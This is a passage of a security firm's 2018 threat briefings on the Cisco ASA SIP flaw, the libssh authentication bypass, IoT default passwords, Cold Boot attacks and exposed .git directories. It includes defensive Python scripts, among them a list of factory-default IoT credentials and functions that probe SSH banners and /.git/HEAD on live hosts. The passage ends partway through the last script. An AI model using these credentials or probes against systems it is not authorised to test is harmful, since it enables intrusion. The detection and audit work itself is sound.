Tomorrow’s cyber threats demand a new kind of cybersecurity workforce

Global Cybersecurity Workforce Shortage to Reach 1.8 Million as Threats Loom Larger and Stakes Rise Higher

The Damaging Effects of IP Theft

Fancy Bear LoJax campaign reveals first documented use of UEFI rootkit in the wild

The Center for Long-Term Cybersecurity, UC Berkeley

InGuardians Resources & Events
Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members and say hi!

We are happy to announce that David Mayer, Senior Security Consultant, will be leading  a SANS Institute mentor session on  “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

11/6/2018 Zero-day Denial of Service flaw in Cisco ASA and FTD appliances

Cisco has issued a security advisory describing a denial of service condition in both its flagship Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD).  The flaw is in the Session Initiation Protocol (SIP) inspection engine of ASA versions 9.4+ and FTD versions 6.0+. An attacker can use this to crash these appliances. These are remotely executed denial of service (DoS) attacks, and instances of use have already been seen in the wild.  The flaw is described in National Vulnerability Database (NVD) under the entry CVE-2018-15454.

InGuardians rates this vulnerability as High impact. As of the end of last week, InGuardians and several other organizations have identified these attacks in the wild.  Cisco ASA and FTD appliances are widely deployed, and there are no patches available at the time of this writing.


InGuardians recommends that all clients running ASA or FTD appliances identify whether their appliances are vulnerable and apply Cisco’s mitigation advice post-haste. As noted, attacks have been seen in the wild and have already caused outages at several organizations.

In its advisory (the first link under Additional Resources), Cisco lists the following potential mitigations:

- Disabling SIP inspection
- Filtering on sent-by-address of
- Rate limiting SIP traffic
- Blocking offending hosts

In addition, Cisco released information to help identify, through log analysis, whether or not your appliances have been affected by the DoS attacks.  To hunt for active exploitation of this flaw, staff can run the following two commands.

This command lists connections on the SIP port; a large number of incomplete SIP connections is an indicator:

show conn port 5060

This command shows CPU utilization per process; high utilization is another indicator:

show processes cpu-usage non-zero sorted

If the appliance has been attacked successfully, it will crash and reload.  This indicator will also show up as an unknown abort of the DATAPATH thread in the output of the following command:

show crashinfo as
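Reading those two command outputs by eye works for one appliance; for a fleet it helps to parse them. The script below is an added example, not code from the briefing or from Cisco: it parses connection-table lines in the general shape of `show conn port 5060` output, counts TCP connections whose ASA flags show a handshake still pending (s, S, a or A: a SYN or ACK is outstanding) as incomplete, names sources holding more than a threshold of them, and pulls the DATAPATH thread’s 5-second CPU figure out of `show processes cpu-usage non-zero sorted`. Both samples are constructed; column layout differs across ASA releases, so check the regular expressions against your own appliance’s output before relying on them. The threshold of 3 is an assumption for the demonstration.

```python
import re
from collections import Counter

# Constructed sample in the general shape of `show conn port 5060` output; flag letters
# follow the ASA connection table (U = up, s/S/a/A = SYN or ACK still pending).
SAMPLE_CONN = """\
TCP outside 203.0.113.10:40001 inside 10.0.0.5:5060, idle 0:00:04, bytes 0, flags saA
TCP outside 203.0.113.10:40002 inside 10.0.0.5:5060, idle 0:00:03, bytes 0, flags saA
TCP outside 203.0.113.10:40003 inside 10.0.0.5:5060, idle 0:00:02, bytes 0, flags saA
TCP outside 203.0.113.10:40004 inside 10.0.0.5:5060, idle 0:00:01, bytes 0, flags saA
TCP outside 198.51.100.7:5060 inside 10.0.0.5:5060, idle 0:00:09, bytes 8412, flags UIO
UDP outside 198.51.100.8:5060 inside 10.0.0.5:5060, idle 0:00:12, bytes 1960, flags -
"""

CONN_RE = re.compile(
    r"^(?P<proto>TCP|UDP)\s+(?P<out_if>\S+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+"
    r"(?P<in_if>\S+)\s+(?P<dst>[\d.]+):(?P<dport>\d+),\s+idle\s+(?P<idle>\S+),\s+"
    r"bytes\s+(?P<bytes>\d+),\s+flags\s+(?P<flags>\S*)"
)

HALF_OPEN_FLAGS = set("sSaA")  # handshake not complete


def parse_conns(text):
    """Parse connection-table lines into dicts; lines that do not match are skipped."""
    rows = []
    for line in text.splitlines():
        m = CONN_RE.match(line.strip())
        if not m:
            continue
        row = m.groupdict()
        row["bytes"] = int(row["bytes"])
        # UDP has no handshake, so only TCP entries can be half-open.
        row["half_open"] = row["proto"] == "TCP" and bool(HALF_OPEN_FLAGS & set(row["flags"]))
        rows.append(row)
    return rows


def summarize(rows, per_source_threshold=3):
    """Count incomplete SIP connections and name sources holding at least the threshold."""
    half_open = [r for r in rows if r["half_open"]]
    per_source = Counter(r["src"] for r in half_open)
    return {
        "total": len(rows),
        "half_open": len(half_open),
        "suspect_sources": sorted(s for s, n in per_source.items() if n >= per_source_threshold),
    }


# Constructed sample in the general shape of `show processes cpu-usage non-zero sorted`.
SAMPLE_CPU = """\
PC         Thread       5Sec     1Min     5Min   Process
0x080cee7d 0xc8614720   91.3%    88.0%    62.5%  DATAPATH-0-1234
0x0814a1b2 0xc8612340    1.1%     1.0%     0.9%  Logger
"""

CPU_RE = re.compile(
    r"(?P<five_sec>\d+\.\d+)%\s+(?P<one_min>\d+\.\d+)%\s+(?P<five_min>\d+\.\d+)%\s+(?P<name>\S+)\s*$"
)


def datapath_cpu(text):
    """Highest 5-second CPU percentage reported for a DATAPATH thread, or None if absent."""
    best = None
    for line in text.splitlines():
        m = CPU_RE.search(line)
        if m and m.group("name").startswith("DATAPATH"):
            value = float(m.group("five_sec"))
            best = value if best is None else max(best, value)
    return best


if __name__ == "__main__":
    print(summarize(parse_conns(SAMPLE_CONN)))
    print("DATAPATH 5s CPU:", datapath_cpu(SAMPLE_CPU))
```

A pile of zero-byte, half-open SIP connections from one source alongside a DATAPATH thread pinned near 100% is the pattern to alert on; the suspect sources are the candidates for the "blocking offending hosts" mitigation.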

Additional Resources

Cisco Adaptive Security Appliance Software and Cisco Firepower Threat Defense Software Denial of Service Vulnerability (Cisco)

Cisco ASA and FTD SIP Inspection denial-of-service vulnerability (CERT)

Cisco zero-day exploited in the wild to crash and reload devices (ZDNET)

InGuardians Resources and Events

On Thursday, the webinar “Kubernetes Hacking and Hardening Episode 2: Bust a Kube” goes live, presented by InGuardians CTO Jay Beale.  Come learn how to hack and defend Kubernetes, containers, and cloud native environments!

Nov 8, 2018 | 10AM PST / 1PM EST

Awesome article about vulnerabilities that often get ignored by many security departments. Tyler Robinson shares his experience and provides helpful tips on how to minimize the risk of a cyber attack via non-computer vectors: threats/7-non-computer-hacks-that-should-never-happen/d/d-id/1333194

Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members and say hi!

We are happy to announce that David Mayer, our Senior Security Consultant will hold a mentor session on  “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

10/30/2018 Windows ‘Deletebug’ Zero-Day allows privilege escalation, data destruction.

A proof-of-concept exploit for a Windows zero-day vulnerability has been released that allows an attacker to delete any kind of file on a victim machine, including those containing data vital to the system. The exploit works on fully-patched Windows 10 machines. The vulnerability is in Microsoft’s Data Sharing Service (dssvc.dll). This is a local service that runs as a LocalSystem account with extensive privileges, and enables data to be brokered between applications.

Mitja Kolsek, describing the vulnerability to Threatpost, said, “Even a low-privileged user can make a request to this service for an undocumented function (only Microsoft and possibly a few outsiders know what this function does), and this function checks whether the requesting user has permissions to create a file in a chosen location.” If the user does not have permission to write the file, the service deletes it.

The problem is the service stops impersonating the user and runs the last step with system privileges, giving the user the ability to delete arbitrary files on the system, whether log files or files they might seek to replace. For example, an attacker may escalate privileges more fully if they could delete the dynamically loaded library (DLL) file from a privileged program, if that program would search for its missing DLL file in a directory to which the attacker can write.

However, as the discoverer SandboxEscaper tweeted, “Here’s a low quality bug that is a pain to exploit…” If SandboxEscaper’s opinion is correct, it is unlikely that there will be immediate wide-reaching uses of the vulnerability. This is in part because an attacker already needs access to the system, or needs to chain this with a remote exploit. With that said, attackers and even automated worm/bot programs chain exploits. InGuardians takes this vulnerability seriously, as does Microsoft, whose Security Response unit notes that the vulnerability is in scope for its Bug Bounty program.

Recognize that this vulnerability affects NEW versions of Windows: Windows 10, Server 2016 and Server 2019. Checking event logs and network logs for any unauthorized access should already be part of IT security efforts. Add to that looking for “impersonation” events, as shown in 0patch’s description.

It is also important to realize that any service running as system may be susceptible to similar flaws or exploits that are as yet unknown. Network access visibility is a critical part of recognizing potential unauthorized intrusions.

Additional Resources
Windows ‘Deletebug’ Zero-Day Allows Privilege Escalation, Destruction

Microsoft Data Sharing Service

SandboxEscaper’s tweet

Tweet from Mitja Kolsek, 0patch co-founder, confirming the zero-day vulnerability

Tweet from 0patch regarding micro-patching the vulnerability

Microsoft Security Response Tweet regarding bug bounty

InGuardians Events and Resources
Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung fu on Dec 7 at 2PM. We will be hanging out after the conference as well, come say hi!

We are happy to announce that David Mayer, our Senior Security Consultant will hold a mentor session on  “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

10/22/2018 Libssh authentication bypass leaves devices vulnerable to unauthenticated shell access.
A critical authentication bypass bug in libssh versions after 0.6 has been identified. Libssh is a library implementation of the SSH version 2 protocol for the C programming language, able to run on multiple platforms as both a server and a client. The vulnerability itself is exploited by sending an SSH2_MSG_USERAUTH_SUCCESS message to the server, which in turn presents a shell to the unauthenticated user, giving them access to the endpoint. The exploit is a mere 27 lines of code and is currently publicly available. Fortunately, fingerprints for the affected services are also publicly available, allowing organizations to scan for exploitable endpoints. So far, the biggest vendor to publicly disclose that it is affected by this issue is F5 Networks, whose BIG-IP Advanced Firewall Manager (AFM) product, versions 12 or newer, is vulnerable to the exploit.

While the full impact of this issue is still being analyzed, the majority of publicly discovered vulnerable devices, outside of the F5 BIG-IP AFM, are SFTP servers, routers, printers, modems, and Internet of Things (IoT) devices. While libssh is not the most popular choice for implementing SSHv2 (OpenSSH does not use it), it is used in a wide variety of devices that could be embedded in any network. The vulnerable code was introduced with libssh 0.6.0 in early 2014, so only devices purchased or updated since then are likely to be affected.

InGuardians recommends that organizations scan their networks for vulnerable libssh versions and either manually update libssh or, if that is not possible, restrict access to the affected interfaces and work with their software/device vendors to resolve the issue. The additional resources below include a Python program to scan networks for this vulnerability.

Note that this serious vulnerability was introduced by a rewrite of the library’s server-side code. Remember: as code ages, applying updates makes sense, but things are NOT always better merely because they are newer. Test and evaluate BEFORE deploying new code.
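As an added example (not code from the original briefing or from the libssh project), the following Python classifies SSH server identification strings the way a banner-based fingerprint scan would: libssh announces itself as “SSH-2.0-libssh_0.7.4” or “SSH-2.0-libssh-0.8.1”, and the version number alone tells you whether the build falls in the affected range (0.6.0 up to but excluding the fixed 0.7.6 and 0.8.4). The sample banners are constructed; fetch_banner() shows how the same string is read from a live host. The assumption is that the banner reflects the real library version, which vendors who backport fixes can break, so treat “vulnerable” here as “needs confirmation”, ideally with the protocol-level test (sending message type 52, SSH_MSG_USERAUTH_SUCCESS, without ever authenticating).

```python
"""Classify SSH server banners for CVE-2018-10933 (libssh) exposure.

Added example, not part of the original briefing or of libssh itself.
Runs offline on constructed banners; fetch_banner() is the live variant.
"""
import re
import socket

# Fixed releases named in the libssh advisory for CVE-2018-10933.
FIXED = {(0, 7): (0, 7, 6), (0, 8): (0, 8, 4)}
FIRST_VULNERABLE = (0, 6, 0)   # flaw arrived with the 0.6 server state machine

# libssh banners use either "_" or "-" between the name and the version.
_BANNER_RE = re.compile(r"^SSH-2\.0-libssh[-_](\d+)\.(\d+)\.(\d+)", re.IGNORECASE)


def parse_libssh_version(banner):
    """Return (major, minor, patch) if the banner is libssh, else None."""
    m = _BANNER_RE.match(banner.strip())
    return tuple(int(x) for x in m.groups()) if m else None


def classify(banner):
    """'vulnerable', 'patched', 'too-old' (pre-0.6), or 'not-libssh'."""
    ver = parse_libssh_version(banner)
    if ver is None:
        return "not-libssh"
    if ver < FIRST_VULNERABLE:
        return "too-old"
    fixed = FIXED.get(ver[:2])
    if fixed is None:
        # 0.6.x never received a fix; 0.9 and later shipped after the patch.
        return "vulnerable" if ver[:2] == (0, 6) else "patched"
    return "patched" if ver >= fixed else "vulnerable"


def fetch_banner(host, port=22, timeout=3.0):
    """Read the server identification string (RFC 4253 section 4.2) from a host."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"SSH-2.0-banner-check\r\n")
        data = b""
        while b"\n" not in data and len(data) < 255:
            chunk = s.recv(255 - len(data))
            if not chunk:
                break
            data += chunk
    return data.decode("ascii", "replace").strip()


# Constructed sample banners (not captured from real devices).
SAMPLE_BANNERS = [
    "SSH-2.0-libssh_0.7.4",
    "SSH-2.0-libssh-0.8.1",
    "SSH-2.0-libssh_0.7.6",
    "SSH-2.0-libssh_0.5.5",
    "SSH-2.0-OpenSSH_7.4",
]

if __name__ == "__main__":
    for b in SAMPLE_BANNERS:
        print(f"{b:28} {classify(b)}")
```

Run it against an export of banners from your own network scan; anything classified “vulnerable” goes on the list for vendor follow-up or interface restriction, and anything “patched” still deserves a spot check if the device vendor is known to rebrand library versions.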

Additional Resources
F5 Vulnerability Advisory “K52868493: libssh vulnerability CVE-2018-10933” (F5)
“CVE-2018-10933 – libssh’s server-side state machine“ (F5 Customer Post)

“CVE-2018-10933 Detail” (NIST)

CVE-2018-10933 Vulnerability Scanner (Leap Security)

Proof of Concept Exploit (GitHub user kn6869610)

InGuardians Events and Resources

If you are at Wild West Hacking Fest this Friday, watch InGuardians’ Suzanne Pereira and Larry Pesce’s talk, “What to Expect When You are Expecting … A Penetration Test”

10/17/2018 California Bill SB-327 Highlights IoT’s Weak Password Security Practices

The “Internet of Things” (IoT) has massively increased the number of Internet-connected devices which can be hacked by anyone who knows those devices’ well-known default passwords. The state of California, with the fifth largest economy in the world, has passed a law that will require every connected device sold in the state to either have a unique initial password or to require the owner to set up a method of authentication before first connecting to the device. This law takes effect on the first day of 2020.


Starting in 2020, makers of Internet-connected devices will be banned from selling devices that share a single initial password across every unit of a product. While the presence of default or trivial (e.g., “admin/admin”) credentials might seem almost laughable in the year 2018, unfortunately that is not the case. The Mirai botnet used both default and trivial credentials to compromise more than 600,000 IoT devices in 2016. Using these devices, it sent some of the largest recorded distributed denial of service (DDoS) attacks, in excess of 1.1 terabits per second. The Graham Cluley article referenced below lists the 60 hard-coded credentials Mirai tried, including common manufacturer-set initial passwords like “admin,” “00000000,” and “Zte521.” This problem isn’t confined to IoT devices, either. Last month, Cisco corrected its use of a static root password shared by all deployed Cisco Video Surveillance Manager appliances in two of the last three releases.


InGuardians recommends that every organization check its own devices for trivially weak authentication, whether that entails static, simple, shared passwords (e.g., found in device manuals) or a lack of authentication. While not guaranteed to be comprehensive, a vulnerability scanner like Tenable’s Nessus, Bomgar’s Retina, or the open source OpenVAS, can be particularly helpful, as these tools check for a number of default credentials.

InGuardians recommends that product vendors take the following additional steps to avoid this type of problem:

  • Conduct internal or third party security product reviews to discover these issues well before the first release of a product, as well as before any major update to a product.
  • Review existing manuals and product penetration testing results to determine whether password security practices meet best practices and the requirements of California Bill SB-327.
  • Share California Bill SB-327 with in-house counsel and compliance officers.

InGuardians recommends that product customers take the following additional steps to avoid this type of problem:

  • Conduct regular vulnerability scanning as a component of a process-oriented security program
  • Build and maintain an inventory of all network-connected devices, including IoT and BYOD.
  • Confirm that all administrative passwords for all devices are unique, strong, differ from vendor defaults, and are maintained in a separate, secure password management system.
  • Place IoT and BYOD devices on separate networks/VLANs, monitored and segmented from each other, from the internal network, and from wide-ranging Internet access.
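The third customer recommendation above (unique, strong, non-default administrative passwords) is easy to audit once the device inventory from the second exists. As an added example, not code from the original briefing, the following Python takes a constructed inventory of devices with their current administrative credentials and flags the three failures SB-327 is aimed at: a credential on a known factory-default list, one credential reused across several devices, and trivially short passwords. The default list is a small constructed subset (three of the entries are the ones named in the text; the rest are assumed for illustration and should be replaced with a full list such as the one in the Cluley article). It does not log in to anything; it audits what your password manager says is deployed.

```python
"""Audit a device inventory for the password weaknesses SB-327 targets.

Added example, not part of the original briefing. Inventory and default
list are constructed for the example.
"""
from collections import defaultdict

# Constructed subset of well-known factory credentials (not a complete list).
KNOWN_DEFAULTS = {
    ("admin", "admin"), ("root", "root"), ("admin", ""), ("root", ""),
    ("admin", "00000000"), ("root", "Zte521"), ("admin", "1234"),
    ("admin", "password"), ("root", "vizxv"), ("ubnt", "ubnt"),
}
MIN_LENGTH = 12  # assumed policy threshold


def audit(inventory, defaults=KNOWN_DEFAULTS, min_length=MIN_LENGTH):
    """Return {device_id: [finding, ...]}; devices with no findings are omitted."""
    findings = defaultdict(list)
    by_credential = defaultdict(list)
    for dev in inventory:
        cred = (dev["user"], dev["password"])
        by_credential[cred].append(dev["id"])
        if cred in defaults:
            findings[dev["id"]].append("vendor default credential")
        if len(dev["password"]) < min_length:
            findings[dev["id"]].append(f"password shorter than {min_length}")
    # SB-327 requires a password unique to each device; a credential reused
    # across the fleet means one leaked password opens all of them.
    for cred, ids in by_credential.items():
        if len(ids) > 1:
            for dev_id in ids:
                findings[dev_id].append(
                    f"credential shared with {len(ids) - 1} other device(s)")
    return dict(findings)


# Constructed sample inventory; in practice, export this from the password
# management system that holds device administrative credentials.
INVENTORY = [
    {"id": "cam-01", "user": "admin", "password": "admin"},
    {"id": "cam-02", "user": "admin", "password": "Xy7!kq92Ls#pQ4"},
    {"id": "cam-03", "user": "admin", "password": "Xy7!kq92Ls#pQ4"},
    {"id": "dvr-01", "user": "root", "password": "Zte521"},
    {"id": "ptr-01", "user": "admin", "password": "R3m$vG8z!wLq2tN9"},
]

if __name__ == "__main__":
    for dev_id, issues in sorted(audit(INVENTORY).items()):
        print(dev_id, "->", "; ".join(issues))
```

Only ptr-01 passes: cam-01 and dvr-01 still carry factory defaults, and cam-02 and cam-03 share one password, which is exactly the per-product credential pattern the law prohibits vendors from shipping.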

Additional Resources

California Senate Bill SB-327 (California Legislature)

Cisco Video Surveillance Manager Appliance Default Password Vulnerability (Cisco Security)

These 60 dumb passwords can hijack over 500,000 IoT devices into the Mirai botnet (Graham Cluley)

InGuardians Resources and Events

Online this Thursday, you can learn from InGuardians CTO Jay Beale, as he demonstrates attack and defense on a Linux Capture-the-Flag machine.

If you are at Wild West Hacking Fest next Friday, watch out for InGuardians’ Suzanne Pereira and Larry Pesce’s talk, “What to Expect When You are Expecting … A Penetration Test”

10/11/2018 Web App Penetration Testing without Threat Hunting May Leave Indicators of Compromise Undetected

Many web applications that are available from the Internet handle very sensitive information governed under various compliance initiatives such as HIPAA, PCI, GDPR, etc.  Understanding how that information is protected within the application is just as important as understanding the attack surface of the application.  If a threat actor has gained unauthorized access to a web application and its associated data via a particular vulnerability, they will often correct that vulnerability immediately, to keep other threat actors out.  Even automated threat actors have historically done this.  For example, in April of 2017, the Adylkuzz malware used the same ETERNALBLUE exploit that WannaCry would use a month later in May.  WannaCry was unable to infect the quarter million Adylkuzz victims, because Adylkuzz hardened the systems it compromised (by blocking SMB networking).   Because attackers so often remove the vulnerabilities they used to compromise systems and networks, a penetration test alone may not demonstrate the full security posture of a web application and the sensitive data housed within.

In cases where penetration tests are performed without subsequent auditing of the system for embedded threat actors, years may pass before an enterprise learns about a compromise and a threat actor’s presence in its system.  The organization may be violating regulations that govern sensitive data or, even worse, exposing itself to downstream liability issues should the threat actor steal or modify data or conduct fraudulent activity.

Likewise, if proper security controls are not in place to protect the data from a threat actor who has gained access to the application server, then the internal security posture of the application is weak and exposes the organization to risk.

Whenever a penetration test is performed on a web application, ensure that two other tasks are also performed: first, threat hunting on the operating systems on which the application and its data reside; second, development of a clear understanding of data flows, encryption, and other internal controls that should protect the data in the case of a compromise.

Additional Resources
“Getting Ahead of The Adversary – Splunk and Johns Hopkins Demonstrate Threat Hunting Tactics” (Splunk)

“How to Become a Master Threat Hunter” (Carbon Black)

Blue Team Services (InGuardians)

InGuardians Events and Resources
A huge thank you to everyone that came by the booth and caught up with us at Derbycon!   A special shout goes out to Annah W. for winning our Derbycon raffle.

If you are at Wild West Hacking Fest, be sure to catch Suzanne Pereira and Larry Pesce’s presentation “What to expect when you’re expecting… a pentest”.  Two of our directors join forces to discuss how you should prepare and operate during a penetration test.

10/2/2018 Which of your secrets do cloud services see?

Which of your secrets are uploaded to cloud services without your explicit instruction? Consider these cases: a Microsoft Word document about an upcoming merger or executive changeover gets infected with malware, triggering its upload to the anti-virus vendor’s cloud service. Or a software crash on a laptop causes an upload of logs and memory dumps, which contain encryption keys, passwords, and confidential files. Or an anti-virus triggers on a ZIP file, uploading the company’s most sensitive financial data to a service. It’s nearly impossible to affirmatively control this data once uploaded. While cloud-based services can bring enormous benefit in cutting off attacks before many customers ever see them, they rely mostly on automated heuristics to decide which files to upload, and those heuristics may grab sensitive information.

Modern security products often look far different from their predecessors from a mere decade ago. In addition to their basic functions, such as blocking unwanted network traffic, anti-virus programs, web proxies, firewalls, VPNs, and even operating systems send various information to cloud-based services. The products’ vendors do this to collect intelligence about malicious activity, crashes, and use patterns to help them understand and react to their customers’ environments.

Security vendors monitor the provided data in real time, reducing many of their customers’ reaction time to potential threats from days to minutes, often automating most of the process. The data have done much to limit opportunities for attackers to obtain unauthorized access or to damage networks after first detection.

However, it’s very easy for proprietary data to get caught up in this. In 2014, software from Kaspersky Labs uploaded suspicious files from a home computer in Maryland. These turned out to be highly classified tools from the National Security Agency’s Tailored Access Operations group, copied by an employee from his work computer to his personal computer. Once the NSA’s tools were compromised, there was no way of reversing this, and the NSA had to halt usage of those tools, likely at significant cost.

The same holds true for anyone using cloud-tied security services. Content from the sites you visit, the files you open, and the software you run may all find its way to a cloud-based vendor. Most will ignore the irrelevant details, but some may parse contents, and some may even sell aggregate or detailed information.

Of course, this problem isn’t confined to security software. Other vendors have used crash data to identify common faults and help developers fix crashes. Photos are automatically uploaded to Apple’s iCloud or Google Photos. Google Sync may automatically back up documents, and cloud storage providers like Box, Dropbox, and Microsoft OneDrive can be configured similarly. Note that any of these services might be configured to use a personal account, rather than one controlled by your organization.

The vast majority of cloud-based security companies take security very seriously and only a tiny fraction of uploaded files are held for very long. Even fewer receive close scrutiny. However, the need to manually review some submissions means that there is always someone who can see them in their raw state. At that point, the uploading entity has essentially lost all control of the uploaded data. The data is subject to subpoena or warrants, misuse such as insider trading, or theft or leaking by malicious actors.

Avoiding this is possible, but not always easy. The most sensitive files might be managed on “air-gapped” systems (i.e., never connected to a network). Working with air-gapped systems limits productivity, but, when properly done, also creates some of the most secure conditions possible.

InGuardians recommends that companies determine which software running on their systems uploads data to cloud services, what data could be uploaded, and how that data is handled once in the vendor’s hands. Companies can start by investigating Terms of Service, End User License Agreements, and applicable laws and regulations. The next step involves using or establishing vendor security questionnaires, whether custom or from one of the three most popular standards: VSAQ, CAIQ, and SIG/SIG-Lite.

Even strong promises should be approached with caution. Appropriate safeguards for the most sensitive data should be in place using a combination of policy and technology to reduce the risk of inadvertent loss of control. This not only limits the ability of cloud services to gain unexpected access, but also limits dissemination among internal personnel who do not have a need to know.

Additional Resources
Vendor Security Assessment Questionnaire (Google)

Consensus Assessments Working Group (Cloud Security Alliance)

Standardized Information Gathering Questionnaire (SFG Shared Assessments)

Kaspersky: Yes, we obtained NSA secrets. No, we didn’t help steal them (Nov 16, 2017)

Dropbox takes a peek at files. But it’s totally nothing, says Dropbox. (Sep 13, 2013)

How artificial intelligence stopped an Emotet outbreak (Feb 14, 2018)

InGuardians Resources and Events
Derbycon: If you are at Derbycon this week, stop by InGuardians booth.  Many of our operators will be there demonstrating tools, as well as teaching skills ranging from lock picking to RFID hacking.
09/17/2018 A new Cold Boot attack puts data on full-disk encrypted computers at risk again

Revisiting the Cold Boot attack, researchers from F-Secure were able to circumvent current protections, gaining access to data on computers even when Full Disk Encryption (FDE) was enabled.

In the original Cold Boot attack, a bad actor abruptly power-cycles a running or sleeping computer. Because the contents of DRAM fade over seconds rather than instantly, the attacker can boot the target system from removable media (such as a USB thumb drive) and use memory harvesting tools to recover the contents of RAM from the previous boot.  Most importantly, the attacker gains the decryption keys for the computer’s encrypted drive.

After the publication of the original Cold Boot attack methodology, hardware manufacturers instituted methods for protecting the RAM storing the full disk encryption (FDE) keys.  In the most common protection method, specified by the Trusted Computing Group, the operating system sets a Memory Overwrite Request (MOR) bit in non-volatile memory whenever keys are held in RAM, and the firmware overwrites RAM at the time of boot.  Unfortunately, this overwrite only occurs when the MOR bit is still set.

F-Secure’s researchers found that, with physical access, they could rewrite the non-volatile memory chip holding the firmware’s settings to flip the MOR bit back to zero, disabling the boot-time overwrite of the RAM holding the FDE keys. This allowed them to use the original Cold Boot attack to recover the full disk encryption keys, and thus the computer’s drive contents.

With a successful re-implementation of the Cold Boot attack using the updated methodology, it is possible for an attacker to gain access to all of the data stored on a computer, even when FDE is enabled. Should the system contain sensitive information, the attacker can gain full access to the data. The attacker also gains the ability to compromise the computer.

There are some hurdles to overcome for an attacker attempting to deliver the updated Cold Boot attack. The attacker must have:

  • Unrestricted physical access to the computer under attack
  • Knowledge and experience delivering the first generation Cold Boot attack
  • Knowledge, experience, and the appropriate hardware tool set to rewrite the system’s firmware settings to disable memory overwrites

These hurdles are surmountable, yet the additional requirement to disable memory overwrites is currently obscure.

In limited cases, F-Secure’s researchers were unable to execute the updated Cold Boot attack. The researchers identified that the most recent Apple computers were currently unaffected by their research, as those machines carry an Apple T2 chip, which places encryption keys in a “secure enclave.”

In most cases there are some simple opportunities to thwart the updated Cold Boot attack introduced by F-Secure’s researchers.  These opportunities include:

  • Train employees to power off or hibernate, rather than sleep, their computers. Consider using group policy to enforce this behavior across all computers belonging to the organization.
  • Proper physical security of computers: computers in public or semi-public (such as a laptop in a hotel room), should never be left “out in the open” or unattended.  They should remain with the owner or physically secured in a manner that would prevent tampering (such as being placed in a safe, in the case of a hotel room)
  • Improved FDE implementations: adoption of a robust BitLocker PIN (or an equivalent pre-boot passphrase), entered at boot time to unlock FDE, significantly thwarts Cold Boot attacks against powered-off or hibernated machines, because the volume key is not loaded into RAM until the user authenticates. A sleeping machine still holds the key in memory, which is why this control must be paired with the power-off or hibernate policy above.

Additional Resources
“Security flaw in ‘nearly all’ modern PCs and Macs exposes encrypted data” (TechCrunch)

“New modification of the old cold boot attack leaves most systems vulnerable” (Ars Technica)

The Chilling Reality of Cold Boot Attacks (F-Secure)

TCG Platform Reset Attack Mitigation Specification (Trusted Computing Group)

InGuardians Resources and Events
The popular, actionable and insightful piece, “12 Things I Learned the Hard Way about Being a Project Manager in Infosec,” by InGuardians’ Director of Operations Suzanne Pereira, contains lessons and reminders on how to manage projects, by focusing on people, communication and advocacy. Read more:

Get some serious RF/Wireless kung fu training from InGuardians Director of Research Larry Pesce at SANS in Las Vegas, Sept 23 – 28, 2018.

Dive deep into ICS Security with hands-on training from Justin Searle, our Director of ICS Security at SANS Las Vegas, Sept 23 – 27, 2018.

09/10/2018 Over 400k websites expose sensitive data via .git/ directory
Speed + Complexity => Errors => Vulnerability.  Your system is probably exposed.
Every week we try to focus on a relevant vulnerability to describe the issue in terms of client exposure. We point to information resources and mitigation strategies to improve security posture and vulnerability detection. This week, InGuardians’ editorial team had too many from which to choose. Here are but a few of the week’s disclosures:
–  NotPetya would have destroyed Maersk’s system if not for ONE server that had been offline due to a power outage.
–  IoT malware infecting aircraft SATCOM systems
–  Schneider controller vulnerability
–  British Airways data breach
–  mSpy’s second data breach
–  400,000 websites expose sensitive system development data via .git/ directories.
The real question then is, if you presume you are exposed, how do you detect and mitigate the risks?
In this week’s newsletter, we focus on the .git/ directory exposure in particular.

Open .git directories can contain a great deal of sensitive information, including the web application’s structure, database passwords, API keys, development IDE settings, and more. Czech researcher Vladimir Smitka discovered over 390,000 websites, the majority .COM TLDs, that had internet-readable development directories.

The cause is in part an error in the check many developers use to confirm that /.git/ is hidden. Querying a web server for /.git/ produces an HTTP 403 error, which is a false negative: the 403 only indicates that the directory has no index file (index.html, index.php, …) and that the server is not configured to auto-index it. The files inside remain individually readable. Smitka demonstrated that by requesting the /.git/HEAD file, which every repository contains and whose contents are predictable, he could determine that many web applications served their .git/ directory contents to the Internet.

Checking for visibility of a directory is good, provided it’s a valid check.  For the specific case of verifying directories, consider the ways to frame the query and what happens when URL and other queries fail: what is the error trap and error message, and are THOSE valid?
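The valid check the paragraph above calls for is the one Smitka used: request /.git/HEAD and look at the body, not the status of /.git/. As an added example (not code from the original briefing or from Smitka’s scanner), the following Python implements that classification. A repository’s HEAD file is either a “ref: refs/heads/<branch>” line or a 40-hex-digit commit hash, so a 200 whose body matches that shape is a confirmed exposure, while a 200 carrying a catch-all HTML page is not, and a 403 on the file itself means access is actually denied. The sample responses are constructed; git_head_exposed() performs the live request against a base URL you supply.

```python
"""Check a web root for an exposed .git/ directory via /.git/HEAD.

Added example, not part of the original briefing or of Smitka's scanner.
The sample (status, body) pairs below are constructed.
"""
import re
import urllib.error
import urllib.request

# HEAD is either a symbolic ref or a bare commit hash.
_HEAD_RE = re.compile(r"^(ref: refs/[\w./-]+|[0-9a-f]{40})$")


def classify_git_head(status, body):
    """Decide exposure from the status code and body returned for /.git/HEAD."""
    if status == 200 and _HEAD_RE.match(body.strip()):
        return "exposed"
    if status == 200:
        return "not-git"      # a catch-all page answered with 200
    if status in (401, 403):
        return "blocked"      # the file itself is denied, unlike a 403 on /.git/
    if status == 404:
        return "absent"
    return "unknown"


def git_head_exposed(base_url, timeout=5.0):
    """Fetch <base_url>/.git/HEAD and classify it; returns (status, classification)."""
    url = base_url.rstrip("/") + "/.git/HEAD"
    req = urllib.request.Request(url, headers={"User-Agent": "git-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status = resp.status
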